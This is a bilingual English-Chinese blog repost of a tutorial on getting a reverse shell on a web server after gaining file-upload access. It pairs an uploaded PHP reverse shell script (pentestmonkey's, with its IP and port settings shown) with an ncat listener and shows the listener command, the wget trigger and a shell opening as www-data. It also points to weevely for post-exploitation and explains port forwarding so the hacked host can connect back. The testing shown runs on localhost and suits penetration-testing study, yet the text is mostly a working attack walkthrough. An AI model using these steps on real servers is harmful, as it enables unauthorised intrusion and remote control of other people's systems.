Php reverse shell with netcat

最新推荐文章于 2024-08-19 10:36:04 发布

kezhen

最新推荐文章于 2024-08-19 10:36:04 发布

阅读量1.7k

点赞数

分类专栏：渗透测试相关

渗透测试相关专栏收录该内容

37 篇文章 0 订阅

订阅专栏

摘自：http://www.binarytides.com/php-reverse-shell-with-netcat/

Once you are able to gain access to a remote website or server such that you can upload any arbitrary file to it, the next thing you want to try out is get a shell on the system. If the system is running php then a php file can be uploaded to it which will give us a reverse shell. There are many web based shell scripts but getting a terminal based shell is far more neater.

一旦你可以访问远程网站或者服务器，那样你就可以上传任意文件，下一步希望在系统上获得一个shell。如果系统可以运行php，那么可以上传一个可以提供反向shell的php文件。有很多基于shell脚本的网页，但是基于shell获得一个终端更简洁。

To get a shell on the system all we need is a reverse shell php script and a commandline tool called netcat. There are many php reverse shell scripts out there and we are going to try a few of them in this post. The first one that we are going to try is from pentestmonkey. You can download it from the website or check this gist.

要在系统上获得一个shell，我们需要的就是一个反向shell php脚本和netcat。有很多反向shell的php脚本，我们在这个帖子里仅介绍少数几个。首先我们尝试来自pentestermonkey[http://pentestmonkey.net/tools/web-shells/php-reverse-shell]。可以在[https://gist.github.com/silv3rm00n/5371322] 下载。

Along with that php script you need netcat. I prefer the ncat utility from nmap suite which is very featureful and cross platform as well. If you are new to netcat then I suggest you read up my tutorial on netcat first. Along with those 2 things you should also have apache+php installed to test the script and understand its working.

netcat 我个人比较倾向于来自nmap套件的ncat，其具有较好的功能和跨平台。如果对netcat不熟悉，建议首先阅读netcat的教程[http://blog.csdn.net/kezhen/article/details/39640477 或者 http://www.binarytides.com/netcat-tutorial-for-beginners/]。另外还需要apache + php 的运行环境，以测试脚本，理解其运行原理。

So first of all start a netcat listener. Reverse shells are based on the principle that the remote or hacked system will connect back to you. This back connection is accepted and handled by the netcat listener. Usage is simple

首先，开启netcat监听器。反向shell基于远程或者被黑的系统反向链接至你的系统。这个反向链接被netcat监听器接受并处理。

$ ncat -vv -n -l -p 1234

The above command is going to start a netcat listener on port number 1234. The l option means listener, the n option means no dns resolution, the p option means the port number and the vv option means verbose 2x. Once the listener starts ncat would report something like this

上面的命令是在1234端口启动一个netcat监听器。l 选项是监听器，n选项意味着不做dns查询，p选项指端口号，而vv选项是2倍的详细信息。启动后输出如下信息：

Ncat: Version 6.00 ( http://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Next thing to do is initiate the php script. The php reverse shell script you downloaded in the above step, copy it to your apache web directory so that you can access it from the browser. The script needs 2 important configurations. That is the ip address and the port number it needs to connect to.

下一步就是初始化php脚本。上面下载的php 反向shell脚本拷贝至apache 网页目录下，那么就可以通过浏览器访问。该脚本需要两个重要的配置：需要连接的ip和端口号。

 
        $VERSION 
         =  
        "1.0" 
        ; 
       
        $ip = '127.0.0.1';  // CHANGE THIS 
       
        $port = 1234;       // CHANGE THIS 
       
        $chunk_size 
        = 1400;

Change the ip address to the ip address of your own machine, or the machine on which netcat is running. In our case, its localhost so 127.0.0.1 would do. Port number should be the port netcat is listening to.

将ip改为netcat运行的机器（这里就是本地机器）。端口号就是netcat监听的端口号。

Now launch the script from a browser by opening the url http://localhost/reverse.php. reverse.php is the name of the script. The moment the script is opened in the browser netcat should receive the connection and show the details like this

现在通过浏览器打开http://localhost/reverse.php脚本。reverse.php即是脚本名称。脚本打开的瞬间netcat将会收到连接信息并显示细节：

Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:59655.
Linux enlightened-desktop 3.5.0-26-generic #42-Ubuntu SMP Fri Mar 8 23:18:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
 17:15:46 up  7:04,  4 users,  load average: 0.08, 0.09, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
enlighte tty7     :0               10:11    7:04m  5:18   0.05s /bin/sh /usr/bi
enlighte pts/0    :0               10:12   25:49   0.07s  0.00s ncat -vv -n -l
enlighte pts/3    :0               10:12    7:03m  0.00s  4.32s kdeinit4: kded4
enlighte pts/4    :0               17:15    0.00s  0.07s  0.00s wget http://loc
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

The last dollar sign indicates that the sh shell is ready to accept and run commands. The netcat output also shows some system details.

最后一个$符意味着sh shell已经准备接受并允许指令。netcat会输出一些系统细节。

The browser wont show any output and would appear to load forever. The browser window can be closed and the shell would still remain running. This is because the script actually creates a separate process for the shell by forking. If you dont have a browser to trigger the php script, then use a commandline utility like wget to trigger the script.

浏览器不会输出任何信息且倾向于总是加载。浏览器窗口关闭，shell仍可以运行。这是因为脚本实际通过forking为shell创建了一个独立的进程。如果没有浏览器触发脚本，也可以通过wget命令触发。

$ wget http://localhost/reverse.php
--2013-04-12 17:15:46--  http://localhost/reverse.php
Resolving localhost (localhost)... 127.0.0.1
Connecting to localhost (localhost)|127.0.0.1|:80... connected.
HTTP request sent, awaiting response...

Just like the browser, wget will keep waiting for some output from the script. Once netcat receives the connection close the wget session as well.

正如浏览器一样，wget将会等待来自脚本的输出。一旦netcat收到连接就可以关闭wget session了。

Other php reverse shell scripts

There is another php reverse shell script hosted at github. Find it here. It generates a password protected reverse shell script using a username/password configuration. Other configuration options include the ip address and the port. Upload it to the target system and launch from browser.

在github上有另外一个反向shell php脚本。可以在[https://github.com/slattman/php-reverse-shell]获得。它通过username/password配置可以产生一个密码保护的反向shell脚本。其他配置参数包括ip和端口。上传至目标系统，通过浏览器可以启动。

And then comes the most powerful one, called weevely.

Weevely is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks.

Weevely has lots more inbuilt features that can automate various post exploitation tasks. In short, it is more than just a console. Check it out here.

weevely是最强大的一个php反向shell脚本：Weevely可以提供像telnet的控制台，并可以运行系统命令且可以自动化的进行管理和利用后的任务。Weevely有很多内置的功能：可以自动进行各种利用后的任务。简而言之，weevely不仅仅是一个控制台。

Notes

Since the php script connects back to us, it is important that no firewall on our own system blocks it. For example a firewall like firestarter on linux or zonealarm on windows might block incoming connections like that. So first make sure that ports on your local system are reachable and connectable. Also if you are on a LAN behind a router then you need to configure port forwarding properly.

因为脚本要连接我们的系统，所以必须保证我们系统的防火墙不会阻止连接。如linux上的firestarter或者windows上的zonealarm会阻止连接的进入。所以必须保证本地系统的端口可达。如果在路由器后面的LAN网内，需要配置端口映射。

To test your ports, after launching netcat listener use this port testing tool. If your ports are connectable from the outer internet then they are OK.

测试端口，需要使用端口测试工具[http://www.ipmango.com/network/port_forward]，如果你的端口可以从外网访问，那就ok。